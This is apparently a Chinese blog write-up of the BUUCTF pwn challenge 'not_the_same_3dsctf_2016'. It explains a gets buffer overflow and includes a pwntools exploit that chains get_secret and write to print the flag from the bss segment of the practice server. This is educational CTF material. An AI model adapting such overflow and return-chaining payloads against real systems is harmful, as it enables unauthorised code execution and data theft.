本站点仍在建设中

BUUCTF-PWN-not_the_same_3dsctf_2016

85次阅读
没有评论

共计 385 个字符,预计需要花费 1 分钟才能阅读完成。

提醒:本文最后更新于 2024-08-29 14:34,文中所关联的信息可能已发生改变,请知悉!

checksec

BUUCTF-PWN-not_the_same_3dsctf_2016

IDA

BUUCTF-PWN-not_the_same_3dsctf_2016

main 函数中的 gets 函数可以溢出

BUUCTF-PWN-not_the_same_3dsctf_2016

这个函数读取了 flag,并存入到变量 fl4g 中,且其在 bss 段,如下图:

BUUCTF-PWN-not_the_same_3dsctf_2016

那么我们只需要使 get_secret() 函数运行,然后再利用 write 函数将 flag 写出就行了

EXP

from pwn import *

p = remote('node4.buuoj.cn', 29733)
elf = ELF('./nts32')

write = elf.sym['write']
bss_fl4g = 0x080eca2d

payload = b'a' * (0x2d) + p32(0x080489A0) + p32(write) + p32(bss_fl4g) + p32(1) + p32(bss_fl4g) + p32(45)

p.sendline(payload)

p.interactive()

结果

BUUCTF-PWN-not_the_same_3dsctf_2016

正文完
CTF PWN
发表至: 安全
2021-12-05
 0
icvuln
版权声明:本站原创文章,由 icvuln 于2021-12-05发表,共计385字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
CTFHUB-PWN-ret2shellcode
BUUCTF-PWN-bjdctf_2020_babystack2
BUUCTF-PWN-get_started_3dsctf_2016
BUUCTF-PWN-bbctf_2020_fmt_me
评论(没有评论)